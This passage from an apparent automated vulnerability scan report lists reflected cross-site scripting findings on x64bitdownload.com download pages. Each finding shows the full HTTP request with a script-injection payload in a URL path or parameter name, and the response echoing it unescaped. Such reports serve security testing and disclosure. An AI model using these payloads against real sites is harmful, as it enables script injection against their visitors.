<input type="hidden" name="referer" value="/downloads/t-64-bit-nokia-ovi-suite-download-bhfheplp.html?b5920"><script>alert(1)</script>1d30e1ca09f=1"/>
...[SNIP]...

4.1740. http://www.x64bitdownload.com/downloads/t-64-bit-nokia-pc-suite-download-psjkkdil.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-nokia-pc-suite-download-psjkkdil.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb7c1"><script>alert(1)</script>cb83eacf673 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloadseb7c1"><script>alert(1)</script>cb83eacf673/t-64-bit-nokia-pc-suite-download-psjkkdil.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:20:22 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21331

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloadseb7c1"><script>alert(1)</script>cb83eacf673/t-64-bit-nokia-pc-suite-download-psjkkdil.html" />
...[SNIP]...

4.1741. http://www.x64bitdownload.com/downloads/t-64-bit-nokia-pc-suite-download-psjkkdil.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-nokia-pc-suite-download-psjkkdil.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8f68"><script>alert(1)</script>c04ad26948f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-nokia-pc-suite-download-psjkkdil.htmld8f68"><script>alert(1)</script>c04ad26948f HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:21:13 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57543

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-nokia-pc-suite-download-psjkkdil.htmld8f68"><script>alert(1)</script>c04ad26948f"/>
...[SNIP]...

4.1742. http://www.x64bitdownload.com/downloads/t-64-bit-nokia-pc-suite-download-psjkkdil.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-nokia-pc-suite-download-psjkkdil.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38ef3"><script>alert(1)</script>3ee45597a1a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-nokia-pc-suite-download-psjkkdil.html?38ef3"><script>alert(1)</script>3ee45597a1a=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:18:06 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57549

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-nokia-pc-suite-download-psjkkdil.html?38ef3"><script>alert(1)</script>3ee45597a1a=1"/>
...[SNIP]...

4.1743. http://www.x64bitdownload.com/downloads/t-64-bit-oovoo-download-jrletedp.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-oovoo-download-jrletedp.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14448"><script>alert(1)</script>41f24c0c9a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads14448"><script>alert(1)</script>41f24c0c9a/t-64-bit-oovoo-download-jrletedp.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:23:38 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21321

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloads14448"><script>alert(1)</script>41f24c0c9a/t-64-bit-oovoo-download-jrletedp.html" />
...[SNIP]...

4.1744. http://www.x64bitdownload.com/downloads/t-64-bit-oovoo-download-jrletedp.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-oovoo-download-jrletedp.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26ff1"><script>alert(1)</script>4d559d8a948 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-oovoo-download-jrletedp.html26ff1"><script>alert(1)</script>4d559d8a948 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:24:48 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60497

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-oovoo-download-jrletedp.html26ff1"><script>alert(1)</script>4d559d8a948"/>
...[SNIP]...

4.1745. http://www.x64bitdownload.com/downloads/t-64-bit-oovoo-download-jrletedp.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-oovoo-download-jrletedp.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1d51"><script>alert(1)</script>4f51ebb208e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-oovoo-download-jrletedp.html?e1d51"><script>alert(1)</script>4f51ebb208e=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:20:20 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60503

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-oovoo-download-jrletedp.html?e1d51"><script>alert(1)</script>4f51ebb208e=1"/>
...[SNIP]...

4.1746. http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-ozum-download-lhtivuds.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37801"><script>alert(1)</script>ad83e3f4619 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads37801"><script>alert(1)</script>ad83e3f4619/t-64-bit-ozum-download-lhtivuds.html HTTP/1.1
Host: www.x64bitdownload.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 14:59:17 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: downloadsite=td6rkej4n5bvmqp9ffd7osao76; expires=Sat, 23 Jul 2011 14:59:17 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21321

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloads37801"><script>alert(1)</script>ad83e3f4619/t-64-bit-ozum-download-lhtivuds.html" />
...[SNIP]...

4.1747. http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-ozum-download-lhtivuds.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47648"><script>alert(1)</script>f734d0ee91b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-ozum-download-lhtivuds.html47648"><script>alert(1)</script>f734d0ee91b HTTP/1.1
Host: www.x64bitdownload.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:59:20 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: downloadsite=fof603f2p2pdrhm2a7rhh57a41; expires=Sat, 23 Jul 2011 14:59:20 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57137

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-ozum-download-lhtivuds.html47648"><script>alert(1)</script>f734d0ee91b"/>
...[SNIP]...

4.1748. http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-ozum-download-lhtivuds.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 850ca"><script>alert(1)</script>6fff343f0ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-ozum-download-lhtivuds.html?850ca"><script>alert(1)</script>6fff343f0ed=1 HTTP/1.1
Host: www.x64bitdownload.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:59:04 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: downloadsite=d6q73p3k9jss96dppl7irlv675; expires=Sat, 23 Jul 2011 14:59:04 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57143

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-ozum-download-lhtivuds.html?850ca"><script>alert(1)</script>6fff343f0ed=1"/>
...[SNIP]...

4.1749. http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html/x22 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-ozum-download-lhtivuds.html/x22

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3db1"><script>alert(1)</script>51fa849155c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloadsa3db1"><script>alert(1)</script>51fa849155c/t-64-bit-ozum-download-lhtivuds.html/x22 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:18:39 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21325

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloadsa3db1"><script>alert(1)</script>51fa849155c/t-64-bit-ozum-download-lhtivuds.html/x22" />
...[SNIP]...

4.1750. http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html/x22 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-ozum-download-lhtivuds.html/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d982"><script>alert(1)</script>b02d30346b5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-ozum-download-lhtivuds.html1d982"><script>alert(1)</script>b02d30346b5/x22 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:19:36 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57145

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-ozum-download-lhtivuds.html1d982"><script>alert(1)</script>b02d30346b5/x22"/>
...[SNIP]...

4.1751. http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html/x22 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-ozum-download-lhtivuds.html/x22

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 683a4"><script>alert(1)</script>5d118b29aed was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-ozum-download-lhtivuds.html/x22683a4"><script>alert(1)</script>5d118b29aed HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:20:12 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57145

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-ozum-download-lhtivuds.html/x22683a4"><script>alert(1)</script>5d118b29aed"/>
...[SNIP]...

4.1752. http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html/x22 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-ozum-download-lhtivuds.html/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 967ee"><script>alert(1)</script>71fe059bb0c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-ozum-download-lhtivuds.html/x22?967ee"><script>alert(1)</script>71fe059bb0c=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:17:12 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57151

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-ozum-download-lhtivuds.html/x22?967ee"><script>alert(1)</script>71fe059bb0c=1"/>
...[SNIP]...

4.1753. http://www.x64bitdownload.com/downloads/t-64-bit-paragon-extbrowser-download-xwigzbic.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-paragon-extbrowser-download-xwigzbic.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3467"><script>alert(1)</script>d05bfef14e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloadsa3467"><script>alert(1)</script>d05bfef14e/t-64-bit-paragon-extbrowser-download-xwigzbic.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:18:06 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21334

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloadsa3467"><script>alert(1)</script>d05bfef14e/t-64-bit-paragon-extbrowser-download-xwigzbic.html" />
...[SNIP]...

4.1754. http://www.x64bitdownload.com/downloads/t-64-bit-paragon-extbrowser-download-xwigzbic.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-paragon-extbrowser-download-xwigzbic.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b74d"><script>alert(1)</script>2f39237061 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-paragon-extbrowser-download-xwigzbic.html2b74d"><script>alert(1)</script>2f39237061 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:18:43 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54632

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-paragon-extbrowser-download-xwigzbic.html2b74d"><script>alert(1)</script>2f39237061"/>
...[SNIP]...

4.1755. http://www.x64bitdownload.com/downloads/t-64-bit-paragon-extbrowser-download-xwigzbic.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-paragon-extbrowser-download-xwigzbic.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66a56"><script>alert(1)</script>621f1f0b522 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-paragon-extbrowser-download-xwigzbic.html?66a56"><script>alert(1)</script>621f1f0b522=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:18 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54640

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-paragon-extbrowser-download-xwigzbic.html?66a56"><script>alert(1)</script>621f1f0b522=1"/>
...[SNIP]...

4.1756. http://www.x64bitdownload.com/downloads/t-64-bit-pidgin-download-kkwthbed.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-pidgin-download-kkwthbed.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4614"><script>alert(1)</script>35e4d9d2a2a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloadsc4614"><script>alert(1)</script>35e4d9d2a2a/t-64-bit-pidgin-download-kkwthbed.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:21:25 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21323

